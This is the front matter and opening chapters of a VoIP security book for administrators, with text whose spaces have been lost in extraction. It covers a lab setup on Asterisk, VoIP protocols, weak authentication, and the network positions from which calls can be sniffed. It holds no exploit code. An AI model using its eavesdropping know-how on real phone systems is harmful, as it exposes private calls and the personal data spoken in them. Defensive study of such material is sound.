HackingVoIPProtocols,Attacks,andCountermeasures

HimanshuDwivedi

Editor

WilliamPollock

Copyright©2010Forinformationonbookdistributorsortranslations,pleasecontactNoStarchPress,Inc.directly:NoStarchPress,Inc.555DeHaroStreet,Suite250,SanFrancisco,CA94107phone:415.863.9900;fax:415.863.9950;info@nostarch.com;www.nostarch.comLibraryofCongressCataloging-in-PublicationData:

Dwivedi,Himanshu.HackingVoIP:protocols,attacks,andcountermeasures/HimanshuDwivedi.p.cm.Includesindex.ISBN-13:978-1-59327-163-3ISBN-10:1-59327-163-81.Internettelephony--Securitymeasures.2.Computernetworks--Securitymeasures.I.Title.TK5105.8865.P372009004.69'5--dc222008038559

NoStarchPressandtheNoStarchPresslogoareregisteredtrademarksofNoStarchPress,Inc.Otherproductandcompanynamesmentionedhereinmaybethetrademarksoftheirrespectiveowners.Ratherthanuseatrademarksymbolwitheveryoccurrenceofatrademarkedname,weareusing

witheveryoccurrenceofatrademarkedname,weareusingthenamesonlyinaneditorialfashionandtothebenefitofthetrademarkowner,withnointentionofinfringementofthetrademark.Theinformationinthisbookisdistributedonan"AsIs"basis,withoutwarranty.Whileeveryprecautionhasbeentakeninthepreparationofthiswork,neithertheauthornorNoStarchPress,Inc.shallhaveanyliabilitytoanypersonorentitywithrespecttoanylossordamagecausedorallegedtobecauseddirectlyorindirectlybytheinformationcontainedinit.

DEDICATIONThisbookisFORMYDAD,quitesimplythebesthumanbeingI

haveevermet.Thisbookisdedicatedtomyfamily,specifically:

Mydaughter,SoniaRainaDwivedi,forhersmiles,laughs,persistence,flexibility,inflexibility,vocabulary,andtheability

tomakeeverybodyaroundherhappy.Myson,whosepresencebringsmorehappinesstoeveryone

aroundhim.Mywife,KusumPandey,whosimplymakesitallworthwhile…

andthensome!

ACKNOWLEDGMENTSI'dliketoacknowledgeandthankAdamWright,whosesupportthroughoutthewritingofthisbookwaswellabovethetypicalcallofduty.Thanks,Adam,forhelpingmeoutduringthenon-peaktimes.SpecialthankstoZaneLackeyfortwothings—hisworkontheIAXSecuritychapteraswellashistechnicalreviewoftheentirebook.Thankyou,Zane,forbeingaverydependableandhighlyskilledindividual.

INTRODUCTIONHackingVoIPisasecuritybookwrittenprimarilyforVoIPadministrators.ThebookwillfocusonadministratorsofenterprisenetworksthathavedeployedVoIPandadministratorswhoarethinkingaboutimplementingVoIPontheirnetwork.ThebookassumesreadersarefamiliarwiththebasicsofVoIP,suchassignalingandmediaprotocols,andwilldivestraightintothesecurityexposuresofeachofthem(thereislittleinfoonhowVoIPworks,butratherthesecurityconcernsrelatedtoit).Thebookprimarilyfocusesonenterpriseissues,suchasH.323,anddevoteslessattentiontoissueswithsmallorPC-basedVoIPdeployments.TheprimarygoalofthisbookistoshowadministratorsthesecurityexposuresofVoIPandwaystomitigatethoseexposures.

BookOverviewThisbookwillfocusonthesecurityaspectsofVoIPnetworks,devices,andprotocols.AfterageneraloverviewinChapter1,"AnIntroductiontoVoIPSecurity,"thefirstsection,"VoIPProtocols,"willfocusonthesecurityissuesincommonVoIPprotocols,suchasSIP,H.323,IAX,andRTP.Chapter2,"Signaling:SIPSecurity,"andChapter3,"Signaling:H.323Security,"bothhavesimilarformats;theybrieflydescribehowtheprotocolsworkandthenshowthesecurityissuesrelevanttothem.TheReal-timeTransportProtocolisdiscussedinChapter4,"Media:RTPSecurity."WhilebothSIPandH.323useRTPforthemedialayer,ithasitsownsecurityissuesandvulnerabilities.Chapter4willalsobrieflydiscusshowtheprotocolworksandthencoverthepotentialattacksagainstit.Chapter5,"SignalingandMedia:IAXSecurity,"willcoverIAX;whileitisnotnecessarilyascommonasSIP,H.323,orRTP,IAXisbecomingmorewidespreadbecauseofitsusebyAsterisk,theverypopularopensourceIPPBXsoftware.Additionally,unlikeotherVoIPprotocols,IAXcanhandlebothsessionsetupandmediatransferwithinitselfonasingleport,makingitattractiveformanynewcomerstotheVoIPmarket.Thesecondsectionofthebook,"VoIPSecurityThreats,"focusesonthreedifferentareasthatareaffectedbyweakVoIPprotocols.Thefirstchapterofthissection,Chapter6("AttackingVoIPInfrastructure")willfocusonthesecurityissuesofVoIPdevices.ThechapterwilldiscussthebasicsofsniffingonVoIPnetworks,attacksonhardphones,attacksonpopularVoIPproductsfromCiscoandAvaya,andattacksoninfrastructureVoIPproductssuchasgatekeepers,registrars,andproxies.ThischapterwillshowhowmanyVoIPentitiesaresusceptibletoattackssimilartothosedirectedatanyotherdevicesontheIPnetwork.Chapter7,"UnconventionalVoIPSecurityThreats,"isafunone,asitwillshowsometrickyattacksusingVoIPdevices.WhiletheattacksshowninthischapterarenotspecifictoVoIPitself,itshowshowtousethe

technologytoabuseotherusers/systems.Forexample,CallerIDspoofing,Vishing(VoIPphishing),andtelephonenumberhijackingwiththeuseofVoIP(ratherthanagainstVoIP)areallshowninthischapter.Chapter8,"HomeVoIPSolutions,"discussesthesecurityissuesinhomeVoIPsolutions,suchasVonage,orsimplysoftphonesavailablefromMicrosoft,eBay,Google,andYahoo!.Thefinalsectionofthebook,"AssessandSecureVoIP,"showshowtosecureVoIPnetworks.Chapter9,"SecuringVoIP,"showshowtoprotectagainstmanyoftheattacksdiscussedinthefirsttwosectionsofthebook.Whileit'snotpossibletosecureagainstallattacks,thischapterdoesshowhowtomitigatethem.

Note✎

ForanattackonVoIPtobepossible,onlyonesideoftheconversationneedstobeusingVoIP.Theothersidecanbeanylandline,mobilephone,oranotherVoIPline.

Thesolutionsdiscusstheneedforstrongerauthentication,encryptionsolutions,andnewtechnologytoprotectVoIPsoftclients.Finally,Chapter10,"AuditingVoIPforSecurityBestPractices,"introducesanauditprogramforVoIP.VoIPSecurityAuditProgram(VSAP)providesalonglistoftopics,questions,andsatisfactory/unsatisfactoryscoresfortheenduser.Theprogram'sgoalistoallowVoIPadministratorsandsecurityexpertstoevaluateVoIPdeploymentsintermsofsecurity.Inadditiontoin-depthdiscussionsaboutVoIPsecurityissues,thebookalsocoversmanyfreesecuritytoolscurrentlyavailableontheInternet.ThesetoolscanhelpsupplementthelearningprocessbyallowingreaderstotesttheirownVoIPnetworksandidentifyanysecurityholesand/orweaknesses.Andinadditiontothesecuritytestingtools,step-by-steptestingprocedureshavebeensuppliedaftereverymajorsectionineachchapter.Forexample,inordertofullyunderstandasecuritythreat,practicalapplicationoftheissue

understandasecuritythreat,practicalapplicationoftheissueisoftenveryimportant.Thisbookprovidesstep-by-stepproceduresandlinkstothemostcurrentinformation.Thisapproachshouldensurethatreadershaveeverythingtheyneedtounderstandwhatisbeingpresentedandwhy.Eachchapterhasacommonstructure,whichistointroduceaVoIPtopic,discussthesecurityaspectsofthetopic,discussthetoolsthatcanbeusedwiththetopicandanystep-by-stepprocedurestofullyexplainordemonstratethetopic/tool,andthenexplainthemitigationprocedurestoprotecttheVoIPnetwork.Additionally,variouscharacterstylesthroughoutthebookhavesignificanceforthereader.Filenamesandfilepathswillappearinitalics,andelementsfromtheuserinterfacethatthereaderisinstructedtoclickorchoosewillappearinbold.Excerptsfromcodewillappearinamonospacefont,andinputthatthereaderisinstructedtotypeintotheuserinterfacewillappearinboldmonospace.Placeholdersandvariablesincodewillappearinmonospaceitalic,andplaceholdersthatthereaderneedstofillinwillappearinmonospacebolditalic.

LabSetupSecurityvulnerabilitiesoftengetlostindiscussions,whitepapers,orbookswithoutpracticalexamples.Theabilitytoreadaboutasecurityissueandthenperformaquickexamplesignificantlyaddstotheeducationprocess.Thus,thisbookprovidesstep-by-steptestingproceduresanddemonstrationsformanyofthesecurityissuescovered.InordertoperformadequateVoIPtestingdescribedinthechapters,anon-productionlabenvironmentshouldbecreated.Thissectiondiscussesthespecificlabenvironmentthatwasusedformostoftheattacksdiscussedinthisbook,aswellasconfigurationfilestosetupthedevicesandsoftware.ItshouldbenotedthatreadersarenotexpectedtolicenseexpensivesoftwarefromCiscoandAvaya;thus,onlyfreeorevaluationsoftwarehasbeenusedinalllabs.However,allattacksshowninthebookapplytobothopensourceandcommercialsoftware/devices(Cisco/Avaya)dependingontheVoIPprotocolsthataresupported.Forexample,thesecurityvulnerabilitiesandattacksagainstSIPwillapplyconsistentlytoanydevice,commercialorfree,thatsupportsit.Forthelabsetup,anySIP/IAX/H.323clientcanbeusedwithanySIPRegistrar/Proxy,H.323gatekeeper,andPBXsoftware,includingAsterisk,Cisco,Polycom,orAvaya.Weworkwiththefollowingsoftwarebecauseofeaseofuse,butwedonotmakeanysecurityguaranteeorfunctionalqualitystatementforanyofthem.

SIPclientX-Lite,whichcanbedownloadedfromhttp://www.xten.com/index.php?menu=download/H.323clientEkiga,whichcanbedownloadedfromhttp://www.ekiga.org/,orPowerPlay,whichcanbedownloadedfromhttp://www.bnisolutions.com/products/powerplay/ipcontact.html/IAXclientiaxComm,whichcanbedownloadedfrom

http://iaxclient.sourceforge.net/iaxcomm/SIP/H.323/IAXserver(proxy,registrar,andgatekeeper)AsteriskPBX,whichcanbedownloadedfromhttp://www.asterisk.org/;avirtualimageofAsteriskcanbedownloadedfromhttp://www.vmware.com/vmtn/appliances/directory/302/,andthefreevirtualimageplayercanalsobedownloadedfromhttp://www.vmware.com/download/player/Attacker'sworkstationBackTrackLiveCD(version2),whichcanbedownloadedfromhttp://www.remote-exploit.org/backtrack.html/;thisISOcanalsobeusedwiththevirtualimageplayermentionedpreviously

SIP/IAX/H.323Server

CompletethefollowingstepstoconfiguretheSIP/IAX/H.323server(AsteriskPBX):

1. LoadtheAsteriskPBXbyusingtheAsteriskPBXVirtualMachine(VoIPonCD-appliance)ontheVMwarePlayer.

2. UnzipVoIP-appliance.zipontoyourharddrive.UsingVMwarePlayer,loadVoIPonCD.

3. Backupiax.conf,sip.conf,H.323.conf,andextensions.confontheAsteriskPBXsystem.

4. Backuptheexistingextensions.conffile(cp/etc/asterisk/extensions.conf

/etc/asterisk/extensions.orginal.conf).5. Backuptheexistingsip.conffile(cp/etc/asterisk/sip.conf

/etc/asterisk/sip.orginal.conf).6. BackuptheexistingH.323.conffile(cp

/etc/asterisk/H.323.conf/etc/asterisk/H.323.orginal.conf).7. Backuptheexistingiax.conffile(cp/etc/asterisk/iax.conf

/etc/asterisk/iax.orginal.conf).

8. ConfiguretheAsteriskPBXsystemasfollows:a. Downloadiax.conf,sip.conf,H.323.conf,extensions.conf,and

sip.conffromhttp://labs.isecpartners.com/HackingVoIP/HackingVoIP.html/

b. Copyallthreefilesto/etc/asterisk,overwritingtheoriginals.

9. RestarttheAsteriskPBXsystem(/etc/init.d/asteriskrestart).

Done!YounowhaveaworkinglabsetupfortheAsteriskPBX.

SIPSetup

CompletethefollowingstepstoconfiguretheSIPserverandSIPclient:

1. Downloadthepreconfiguredsip.conffilefromhttp://labs.isecpartners.com/HackingVoIP/HackingVoIP.html/

2. Copysip.confto/etc/asteriskontheVoIPVMwareappliance.3. StartX-Liteandrightclickinitsmaininterface.4. SelectSIPAccountSettings.5. SelectAddandenterthefollowinginformationforeach

field:a. Username:Soniab. Password:HackmeAmadeusc. Domain:IPaddressoftheAsteriskPBXserverd. ChecktheRegisterwithdomainandreceiveincomingcallsbox

andselecttheTargetDomainradiobutton.6. SelectOKandClose.

Done!YouarenowregisteredtoaSIPserverusingtheSIPclient.

H.323Setup(Ekiga)

CompletethefollowingstepstoconfiguretheH.323client:

1. OpenEkiga(Start►Programs►Ekiga►Ekiga).2. GotoEdit►Accounts►Addandenterthefollowing

information:a. Accountname:H.323LabClientb. Protocol:H.323c. Gatekeeper:IPaddressoftheAsteriskPBXserverd. User:Usernamee. Password:Password

Done!YouarenowregisteredtoanH.323serverusingtheH.323client.

IAXSetup

CompletethefollowingstepstoconfiguretheIAXclient:

1. OpeniaxComm.2. Fromthemenubar,selectOptions►Accounts.3. SelectAddandenterthefollowinginformation:

a. Accountname:anythingb. Host:IPaddressofAsteriskPBXc. Username:Soniad. Password:123voiptest

4. SelectSave.5. SelectDone.

Done!YouarenowregisteredtoanIAXserverusingtheIAXclient.

client.Atthispoint,thelabissetuptoperformalltheattackexerciseslistedineachchapterofthebook.

Chapter1.ANINTRODUCTIONTOVOIPSECURITYFromtheDemocraticParty'sheadquartersintheWatergatecomplexin1972toHewlett-Packard(HP)in2006,attacksontelephoneinfrastructurehavebeenaroundforsometime.WhilethosewhoattackedtheDemocraticPartyandthosewhoattackedHPhaddifferentmotives,theirintentionswereverysimilar:therecordingoftelephoneconversationscontainingsensitiveinformation.TheadventofphonecallsovertheInternet,bywayofVoiceoverIP(VoIP),doesnotchangethemotivesorthetypesofpeopleinvolved(professionalattackers,membersoforganizedcrime,andyourfriendlyneighborhoodteenager).However,itdoesmakesuchattackseasier.ImaginehowhappyPresidentRichardNixon'scampaigncommitteewouldhavebeenifitsoperativeshadhadtheabilitytotaptheDemocraticParty'stelephonesintheWatergatecomplexremotely.OrimaginehowthrilledHPexecutiveswouldhavebeeniftheycouldhavesimplydeployedVoIPinordertosecretlyrecordconversations.Nowimaginehowhappyyourboss,youremployees,yoursonordaughter,yourmotherorfather,organizedcrimeindividuals,yourcubicle-mate,orthatsuspiciouspersonintheconferenceroomontheeighthfloormayfeelwhentheylearnhoweasyitistolistentoyourmostsensitivephonecalls,includingoneswhereyouhavetoprovideyoursocialsecurityorcreditcardnumbertotheotherparty.ForthoseofuswhodonotliketheNationalSecurityAgency(NSA)listeninginonourphonecalls,theproblemsofprivacyandsecurityhavejustgottenworse.TheprimarypurposeofthisbookistoexplainVoIPsecurityfromahackingperspective.We'llcoverattacksonVoIPinfrastructure,protocols,andimplementations,aswellasthemethodstodefendagainsttheknownvulnerabilities.Securityconcernsaside,VoIPisanexcitingnewtechnologythat,asnotedearlier,allowsuserstoplacetelephonecallsover

that,asnotedearlier,allowsuserstoplacetelephonecallsovertheInternet.Ratherthantraditionalphonelines,voicecommunicationusesInternetProtocol(IP)networking.WhilethegeekfactorofusingVoIPiscertainlyappealing,costhasbeenamajordriverformanyVoIPdeployments.Forexample,organizationscansavethousandsofdollarsperyearbyswitchingtoVoIP.SavingmoneybyusingtheInternetinthismannerhasbeenapopulartrendinthepasttwodecades;however,sohastheexploitationoftherelatedsecurityproblems.VoIPreliesonprotocoltraitsthathaveplaguednetworkadministratorsforyears.Theuseofcleartextprotocols,thelackofproperauthentication,andthecomplexityofdeployingstrongend-to-endsecurityarejustafewexamplesofwhyVoIPnetworksaresusceptibletoattack.Thegoalofthisbookistoraiseawareness,describepotentialattacks,andoffersolutionsforVoIPsecurityrisksandexposures.ThischaptercoverssomebasicsonVoIP,layingthegroundworkforbothVoIPexpertsandreaderswhoarelearningaboutVoIPforthefirsttime.Thetopicscoveredinthischapterare:

WhyVoIPVoIPBasicsVoIPSecurityBasicsAttackVectors

WhyVoIPThefollowinglistsummarizeswhyVoIPsecurityisimportant.Similartoanynewertechnologyanditssecurity-relatedaspects,alonglistofargumentsoftenappearsonwhysecurityisnotneeded.Thefollowingisanon-exhaustivelistofwhysecurityisimportanttoVoIP:

Implicitassumptionofprivacy

Mostusersbelievetheirphonecallsarerelativelyprivate,atleastfromtheuserssurroundingthem,butperhapsnot

leastfromtheuserssurroundingthem,butperhapsnotfromtheNSA.Ifyouhaveeverduckedintoaconferenceroomtomakeapersonalorotherwisesensitivephonecall,youexpecttohaveVoIPprivacy.

Theuseofvoicemailpasswords

IfVoIPsecuritydoesnotmatter,thenusershavenoneedtopassword-protecttheirvoicemailaccess.ListeningtoavoicemailsystemusinginsecureVoIPphonesallowsanypersononthelocalsegmenttolistenaswell.

Thesensitivityofvoicecalls

VoIPisoftenusedincallcenters,wherecreditcardnumbers,socialsecuritynumbers,andotherpersonalinformationarefrequentlytransmitted.Ifananonymousattackerisalsolisteningtothecall,thenalltheinformationcanbeconsideredcompromised.

HomeVoIPserviceswithinsecurewireless

HomeVoIPuseisverypopularbecauseofcostreasons,butmanyusersareestablishingtheirconnectionsviainsecurewirelessaccesspoints.InsecurewirelessaccesspointsandinsecureVoIPtechnologycanallowyourneighborsorevensomeonepassingthroughyourneighborhoodtolistentoyourphonecalls.

Compliancewithgovernmentdataprotectionstandards

Organizationshavetolimitthespreadofsensitiveuserinformationacrosstheirdatanetworks;however,thesameideashouldapplytoinformationgoingacrossvoicenetworksusingIP.

VoIPBasicsBeforewedelvetoofarintoVoIP'ssecurityissues,weshoulddiscussthebasicsofthetechnology.Manybuzzwords,protocols,anddevicesareassociatedwithVoIP.InordertofullyunderstandthesecurityimplicationsofalltheprotocolsanddevicesthatmakeupVoIP,wewilldiscussthemajoronesbriefly.

HowItWorks

VoIPusesIPtechnology.InamannersimilartohowyourcomputerusesTCP/IPtotransferpacketswithdata,VoIPtransmitspacketswithaudio.Insteadofthedataprotocols—suchasHTTP,HTTPS,POP3/IMAP,andSMTP—usedinthetransferofdatapackets,VoIPpacketsusevoiceprotocols,suchasSIP(SessionInitiationProtocol),H.323,IAX(Inter-AsteriskeXchangeprotocol),andRTP(Real-timeTransportProtocol).TheheaderintheTCP/IPpacketfordatawillbethesameasforVoIP,includingEthernetframes,sourceIPaddress,destinationIPaddress,MACinformation,andsequencenumbers.Figure1-1showsanexampleofhowVoIPintegrateswiththeOSImodel,whereitemsinboldarecommonVoIPprotocols.

Protocols

TheprimaryprotocolsusedwithVoIPareSIPandH.323atthesessionlayer,whichisusedtosetupaphonecall,andRTPatthemedialayer,whichhandlesthemediaportionofthecall.Hence,SIPandH.323establishacallconnectionandhanditofftoRTP,whichsendsthemediaforthecall.IAXistheoneprotocolthatdoesbothsessionsetupandmedia(i.e.,voice)transfer.

Figure1-1.OSImodelwithVoIP

ThesetupportionforaVoIPcallusuallytakesplacewithafewsupportingservers,suchasSIPProxy/Registrarand/orH.323gatekeeper/gateways.OncethesessionissetupusingSIPorH.323,thecallissenttothemediaprotocol,whichisRTP.Figure1-2showsanexample.

Figure1-2.VoIPprotocolswithsessionandmediatraffic

Note✎

EitherSIPorH.323isusedforsessionsetup,andthenbothofthemuseRTPformedia.SIPandH.323cancoexistinoneenvironment,suchasaSanFranciscoofficeusingSIPandaNewYorkofficeusingH.323,butthesamehandsetusuallywillnotuseSIPandH.323atthesametime.

WhileSIPandH.323performsimilarsetupservices,theygoabouttheminverydifferentways.TheSIPprotocolisdesigned

similartoHTTP,wheremethodssuchasREGISTER,INVITE,FORWARD,LOOKUP,andBYEareusedtosetupacall.H.323usesacollectionofprotocols,suchasH.225,H.245,H.450,H.239,andH.460,toperformthesessionsetup.Also,bothprotocolsusesupportingservers,suchasSIPProxies,SIPRegistrar,H.323gatekeeper,andH.323gateway,betweenthetwoendpointstosetupacall.Whenthecallisfinallysetup,bothprotocolsuseRTPprotocolforthemedialayer,whichtransfersaudiobetweentwoormoreendpoints.IAX,whichisnotaspopularasSIPorH.323,isusedbetweentwoAsteriskservers.UnlikeSIPandH.323,IAXcanbeusedtosetupacallbetweentwoendpointsandusedforthemediachannel.IAXdoesnotuseRTPformediatransferbecausethesupportisbuiltintotheprotocolitself.ThismakesitattractivetoorganizationsthatdesiresimplicityintheirVoIPdeployments.

Deployments

VoIPdeploymentsincludeavarietyofservers,services,andapplicationsthatareusedwithSIP,H.323,IAX,orRTP.Dependingonthedeploymentused,thefollowingtypesofserversareused:EndpointAgenerictermusedforeitherahardphoneorsoftphoneH.323gatekeeperRegistersandauthenticatesH.323endpointsandstoresadatabaseofallregisteredH.323clientsonthenetworkH.323gatewayRoutescallsbetweenH.323gatekeepersHardphonesAphysicaltelephone/handsetusingIPforvoicecommunicationIPPBXAPrivateBranchExchange(PBX)systemthatusesIPforvoicecommunication;usedtoroutetelephonecallsfromoneentitytoanother

SessionBorderControllerHelpsVoIPnetworkscommunicateacrosstrustboundaries(SBCsgenerallyprovideapatharoundfirewalls,notworkwithorthroughthem)SIPProxyProxiescommunicationbetweenSIPUserAgentsandserversSIPRegistrarRegistersandauthenticatesSIPUserAgents(viatheREGISTERmethod);italsostoresadatabaseofallregisteredSIPclientsonthenetworkSoftphonesAsoftwaretelephoneusingIPforvoicecommunicationDependingonthesolutionanorganizationwishestouse,oneormoreofthesetypesofsystemsareused.Figure1-3showsaVoIParchitectureusingSIP/RTP,Figure1-4showsaVoIParchitectureusingH.323/RTP,andFigure1-5showsaVoIParchitectureusingIAX.Inadditiontothesupportingservers,services,andapplications,VoIPtelephonesarealsousedindeployments.VoIPhardphones,whicharephysicalphoneswithanEthernetconnection(RJ-45)ontheback,areoftenused.PopularvendorsofVoIPhardphonesincludeCisco,Avaya,andPolycom.VoIPhardphonesareintendedtosimplyreplaceatraditionallandlinephone.ItshouldbenotedthatadigitalphoneisnotthesameasaVoIPhardphone.Digitalphonesareoftenusedinbusinessenvironmentswhileanalogphonesareoftenusedinhomeenvironments,butneitherareVoIPhardphones.

Figure1-3.VoIPdeploymentswithSIPdevices

Figure1-4.VoIPdeploymentswithH.323devices(RTPthroughfirewalls)

Figure1-5.VoIPdeploymentswithIAXdevices

VoIPsoftphonesaresoftware-basedphonesrunningwithinyourcomputer'soperatingsystem,includingWindows,Unix,Linux,orMacOS.Asimpliedbytheirsoftware-basednature,softphonesdonotphysicallyexist.AsoftphoneusestheIPconnectiononyourcomputertomakeaudiocalls.AgoodexampleofaVoIPsoftphoneisthepopularapplicationSkype.Yahoo!Messenger,GoogleTalk,andMicrosoftLiveMessengerarealsoexamples.ItshouldbenotedthatmosthardphonevendorsalsoprovideasoftphonetobeusedwiththeirsystemsbecausebothtypesofphonesaresimplyusingIPforaudioconnectivity.Additionally,allVoIPequipment,regardlessofwhetheritisasoftphoneorahardphone,cancalleachotheraswellasothertraditionalphonelines,includinglandlinesandmobilephones.SIPhardphones/softphonesareusuallyreferredtoasUserAgents,andH.323hardphones/softphonesareusuallyreferredtoasendpoints.Forspecificdefinitions,refertoBasicVoIPTerminologyfromtheVoIPSAwebsite:http://www.voipsa.org/Activities/VOIPSA_Threat_Taxonomy_0.1.pdf/

VoIPSecurityBasicsNowthatwehavethebasicsofVoIPcovered,let'sgooversomesecuritybasics.Nomatterwhattopicisbeingaddressed,fromstoragetowebapplicationsecurity,themaincomponentsofsecurity,includingauthentication,authorization,availability,confidentiality,andintegrityprotection,willalwaysneedtobediscussed.

Authentication

TheauthenticationprocessinmostVoIPdeploymentoccursatthesessionlayer.Whenanendpointconnectstothenetworkorplacesaphonecall,authenticationtakesplacebetweentheVoIPphoneandsupportservers,suchasSIPRegistrars,H.323gateways,orIAXAsteriskservers.Mediaprotocols,suchasRTPorthemediaportionofIAX,donotrequireauthenticationbecauseitalreadyoccursatthesessionsetupportionofacall.Whiletheuseofauthenticationisalwaysagoodthing,theuseofinsecureorpoorauthenticationmechanismsisnot.Unfortunately,SIP,H.323,andIAXalluseweakauthenticationmechanisms,whicharediscussedinChaptersChapter2,Chapter3,andChapter4.Themostcommondefaultauthenticationtypesforeachsignalingprotocolare:SIPDigestauthenticationH.323MD5hashofgeneralID(username),password,andtimestampIAXMD5hashofpasswordandthechallengeWhentwophonesarecallingeachother,theyauthenticatenottoeachotherbuttointermediatesupportservers.Figure1-6showsanexampleauthenticationprocessatahighlevel.

Figure1-6.Authenticationprocessatahighlevel

Authorization

AuthorizationonVoIPcansometimesbeusedforsecuritypurposes.Forexample,limitingcertainVoIPendpoints'abilitytodialspecificphonenumbersmaybedesirable.PermittingonlycertaindevicestojointheVoIPnetworkalsomayhelpprotectVoIPnetworks.ItshouldbenotedthatauthorizationvaluesarerarelyusedinenterpriseVoIPdeploymentsandareeasytobypass.Nonetheless,thefollowinglistshowswhatentitiescanbeusedforauthorizationparameters:E.164aliasEachH.323endpointcontainsanE.164alias.TheE.164aliasisaninternationalnumbersystemthatcomprisesacountrycode(CC),anationaldestinationcode(NDC),andasubscribernumber(SN).AnE.164aliascanhaveupto15alphanumericvaluesandcanbeseteitherdynamicallybyagatekeeperdeviceorlocallybytheendpointitself.MACMachineAccessControladdressesareoneveryEthernet-enabled(Layer2intheOSImodel)device.TheseaddressesaresometimesusedtoauthorizecertaindevicesonVoIPnetworks.URISIPreallydoesnothaveanauthorizationvalue,buttheUniformResourceIdentifier(URI)isavaluethateachSIPUserAgentcontains.Thevaluecanbeusedtoauthorizeendpoints.SimilartoSIP,IAXdoesnothaveanauthorizationvalue,buttheURIcanalsobeused.

Availability

VoIPnetworksneedtobeupandrunningmostofthetime,ifnotallofthetime.UnlikewithotherIT-managedservices,suchasemail,calendaring,orevenInternetaccess,usershavegrowntorelyontelephones100percentofthetime.Usually,userscantoleratehourswhen"thenetworkisdown,"buttheywillnotbeverypatientwhentheyhear"thetelephonescannotbeusedbecauseofaDenialofServiceattack."HavingtheabilitytomakereliabletelephonecallsisalmostamandateforVoIP.ThemethodsusedtoensuretheVoIPnetworkremainavailableareshowninthefollowinglist.QoSQualityofServiceisusedwithVoIP.QoScontainsqualityrequirementsforcertaintypesofpacketsandservices.Inmanysituations,audiopacketsaregivenpriorityoverdatapacketsusingQoS.SeparatingdatanetworksandvoicenetworksVoicenetworksareoftenplacedonaseparatenetworkand/orVLAN,isolatingthemfromdatapackets.WhiletheInternetisnotaseriesoftubesthatcouldgetcloggedup,separatingthevoicenetworkscanisolatethemfromissuesthatappearondatanetworks,suchasanunresponsiveswitch/router.

Encryption

TheencryptionofVoIPtrafficcanoccuratmultipleplaces,includingsignalingormedialayers.Becauseauthenticationoccursatthesignalinglayerandtheaudiopacketsareusedatthemedialayer,encryptingVoIPtrafficintwodifferentsegmentsisoftenrequired.Forexample,protectingthesignalingbutnottheaudioleavestheactualcommunicationunprotected;however,protectingthemediaandnotthesignalinglayerleavestheauthenticationinformationunprotected.Inallsituations,thefollowingitemscanbeusedtoencryptVoIPnetworks:

IPSecPointtoPointIPSecgatewayscanbeusedtoprotectVoIPtrafficoverpublicoruntrustednetworks,suchastheInternet.ItshouldbenotedthatIPSecisoftennotusedbetweenendpointsbecauseofthelimitedsupportforanIPSecclientonVoIPclients.SRTPSecureRealTimeTransferProtocolcanbeusedwithAdvancedEncryptionStandard(AES)toprotectthemedialayerduringVoIPcalls.

Note✎

ItshouldbenotedthatifSRTPisused,inmanycasesthekeygoesacrossthenetworkincleartextonthesessionsetupprotocol(SIPorH.323).HenceitisimportanttoalsouseSSLwiththesessionsetupprotocoltoleveragethefulladvantagesofSRTP.

SSLVoIPprotocolscannativelybewrappedwithSSL(SIPS)orwithStunnel(H.323)toprotectsignalingprotocols.

AttackVectorsAlltechnologyhasasecurityissue,fromelectronicvotingmachinestoVoIP.Oneoftheitemsthatoftenconfusesorinappropriatelydiffusesmattersistheperceiveddifficultyinvolvedinlaunchingandcarryingoutanattack.Thetruthisthatwithsufficientmotivation,includingpossiblewealth,fame,orvengeance,anysecurityissuecanbeexposedandexploited.VoIPattackvectorsaresimilartotraditionalvectorsinnetworkingequipment.Forexample,thereisnoneedtohavephysicalaccesstoaphoneortothePBXcloset.TheaccessneededtoperformVoIPattacksdependonthetypeofVoIPdeployment.ThemostpopularattackvectorsforVoIPnetworksareshowninthefollowinglist.Alocalsubnet,suchasaninternalnetwork,whereVoIPisusedByunpluggingand/orsharingaVoIPhardphone'sEthernetconnection(usuallysittingonone'sdesk),anattackercanconnecttothevoicenetwork.(SeeSectionAinFigure1-7.)Alocalnetworkthatisusingwirelesstechnologywithuntrustedusers,suchasacoffeeshop,hotelroom,orconferencecenterAnattackercansimplyconnecttothewirelessnetwork,reroutetraffic,andcaptureVoIPcalls.(SeeSectionBinFigure1-7.)Apublicornontrustednetwork,suchastheInternet,whereVoIPcommunicationisusedAnattackerwhohasaccesstoapublicnetworkcansimplysniffthecommunicationandcapturetelephonecalls.(SeeSectionCinFigure1-7.)

Figure1-7.VoIPattackvectors

SummaryVoIPisanexcitingemergingtechnology.WhileVoIPhasbeenaroundforyears,organizationsandhomeusershaveonlyrecentlybeguntoadoptit.Aswithanynewtrend,thesecurityimpactonprivateandsensitiveinformationneedstobeaddressed.Thegoodnewsisthatwhendonecorrectly,VoIPcanbesecure.However,similartoanytechnologythattransportsconfidentialinformation,securitytestingandevaluationneedstobeperformedtoproperlyshowthepotentialrisktoanorganization.Thisbookisanattempttostartthediscussionforvulnerabilitydetection,byshowingthesecurityweaknessesandcountermeasuresformostcurrentVoIPdeployments.

PartI.VOIPPROTOCOLS

Chapter2.SIGNALING:SIPSECURITYSIP(SessionInitiationProtocol)isaverycommonVoIPsignalingprotocol.ItoftendominatesthediscussionofVoIPsecurity;however,justliketheYankeesandtheRedSox,itgetsmoreattentionthanitactuallydeserves.H.323isprobablythemorecommonsignalingprotocolinenterpriseenvironments;however,becauseH.323isverycomplexandnoteasytoacquire,itisoftenovershadowedbySIP.(SeeChapter3formoreonH.323security.)ThischapterisdedicatedtoSIPbasicsandsecurityattacks,includingauthentication,hijacking,andDenialofService.We'llalsofocusonsecurityattacksagainstVoIPinfrastructure,specificallySIPUserAgents,Registrars,Redirectservers,andProxyservers.FormoreinformationonSIP,refertoRFC3261(http://www.ietf.org/rfc/rfc3261.txt?number=3261/).

Note✎

SIPsecurityissuesarenotuniquetoanyonevendororonetypeofdeployment.AnydevicethatsupportsSIPforsessioninitiation,bothforhardorsoftphones,issubjecttotheseissues.

Intermsofdeployment,SIPcanbeusedoneithersoftphonesorhardphones.AsnotedinChapter1,asoftphoneisasoftware-basedphonerunningonaPCorMac,suchasSkype,GoogleTalk,orAvaya/Cisco.SoftphonesusuallyrequireasoftwareclientandsometypeofInternetconnection.Ahardphoneisaphysicaldevicethatlookssimilartotheexistinganalogphonesinmanyhomes.Unlikeananalogphone,however,aVoIPhardphonehasanEthernetconnectionratherthanatypicaltelephonejack(RJ-45insteadofRJ-11).

Note✎

SIPisthesessionsetupprotocoloftenusedwithsoftphones;however,itisalsogainingpopularityinhardphonedevices.

